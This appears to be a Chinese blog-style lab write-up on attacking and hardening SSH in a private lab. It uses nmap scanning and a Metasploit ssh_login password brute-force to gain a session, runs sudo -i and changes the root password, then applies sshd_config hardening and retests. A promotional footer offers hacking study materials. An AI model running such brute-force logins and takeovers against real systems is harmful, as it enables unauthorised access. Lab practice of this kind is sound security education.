一、实验
1.环境
(1)主机
表1 主机
| 系统 | 版本 | IP | 备注 |
| Kali Linux | 2022.4 | 192.168.204.154(动态) | |
| Ubuntu | 8.04 | 192.168.204.143 | Kali(2022.4)的目标主机 |
(2)查看Kali Linux (2022.4)系统版本
cat /etc/os-release

(3) 查看Kali Linux (2022.4)系统IP地址
ip addr | grep 154

(4)查看Ubuntu 8.04 系统版本及IP地址
lsb_release -a

ip addr

2.nmap扫描目标主机
(1)扫描⽬标主机所在⽹段所有存活的主机
nmap -sP 192.168.204.0/24

(2)扫描⽬标主机所有开放端⼝对应的服务和软件版本
22端口已开放
nmap -sV 192.168.204.143

3.Kali Linux 进行 SSH 渗透
(1)进入MSF 控制台
msfconsole

(2) 搜索 ssh_login脚本
search ssh_login

(3) 使⽤编号为 0 的脚本
use 0

(4) 设置⽬标主机
set rhosts 192.168.204.143

(4)查看选项
show options

(5)设置用户名与密码本
set username msfadmin

set pass_file zidian.txt

(6)运⾏脚本
run

(7)查看会话
sessions

(8)连接会话
sessions 1

查看用户身份
whoami

查看路径
pwd

提升权限
sudo -i

再次查看用户身份
whoami

更改密码
password root

(9)MobaXterm远程连接
连接



3.Kali Linux 进行 SSH 防御
(1)SSH安全配置(端口)
vim /etc/ssh/sshd_config

修改端口


(2)重启
/etc/init.d/ssh restart

(3)退出之前的MSF

(5)进入MSF 控制台
msfconsole

(6) 搜索 ssh_login脚本
search ssh_login

(6) 使⽤编号为 0 的脚本
use 0

(7) 设置⽬标主机
set rhosts 192.168.204.143

(8)设置用户名与密码本
set username msfadmin

set pass_file zidian.txt

(9)运⾏脚本
失败
run

(10)nmap扫描端口
ssh端口为12345
nmap -sV 192.168.204.143


(11)查看选项
show options

(12) 设置目标端口
set rport 12345

(13)运⾏脚本
run

(14)SSH安全配置(端口)
vim /etc/ssh/sshd_config

修改登录验证时间


(15)重启
/etc/init.d/ssh restart

(16)验证(等待1分钟)

(17)SSH安全配置(容错次数)
vim /etc/ssh/sshd_config

修改容错次数

(18)重启
/etc/init.d/ssh restart

(19)容错2次

二、问题
1.SSH有哪些安全配置
(1)配置
Port 12345 //端口
LoginGraceTime 1m //登录验证耗时
PermitRootLogin no //不允许root远程登录
MaxAuthTries 2 //最大容错次数2
AllowUsers msfadmin@192.168.204.100 //允许指定用户在指定IP上登录
2.MSF 退出报错
(1)报错
[*] You have active sessions open, to exit anyway type "exit -y"

(2)原因分析
有session会话正在运行。
(3)解决方法
exit -y

题外话
今天只要你给我的文章点赞,我私藏的网安学习资料一样免费共享给你们,来看看有哪些东西。
网络安全学习路线&学习资源
下面给大家分享一份2025最新版的网络安全学习路线资料,帮助新人小白更系统、更快速的学习黑客技术!
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图&学习规划。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

需要高清完整学习路线图,和全套网络安全技术教程的小伙伴!
↓↓↓ 扫描下方图片即可前往获取↓↓↓
学习资料电子文档
压箱底的好资料,全面地介绍网络安全的基础理论,包括逆向、八层网络防御、汇编语言、白帽子web安全、密码学、网络安全协议等,将基础理论和主流工具的应用实践紧密结合,有利于读者理解各种主流工具背后的实现机制。

网络安全源码合集+工具包
视频教程
很多朋友都不喜欢晦涩的文字,我也为大家准备了视频教程,,每个章节都是当前板块的精华浓缩。(全套教程点击领取哈)

因篇幅有限,仅展示部分资料,需要扫描下方图片即可前往获取

好了就写到这了,大家有任何问题也可以随时私信问我!希望大家不要忘记点赞收藏哦!
特别声明:
此教程为纯技术分享!本文的目的决不是为那些怀有不良动机的人提供及技术支持!也不承担因为技术被滥用所产生的连带责任!本书的目的在于最大限度地唤醒大家对网络安全的重视,并采取相应的安全措施,从而减少由网络安全而带来的经济损失。!!!
本文转自网络,如有侵权请联系删除。
2595

被折叠的 条评论
为什么被折叠?



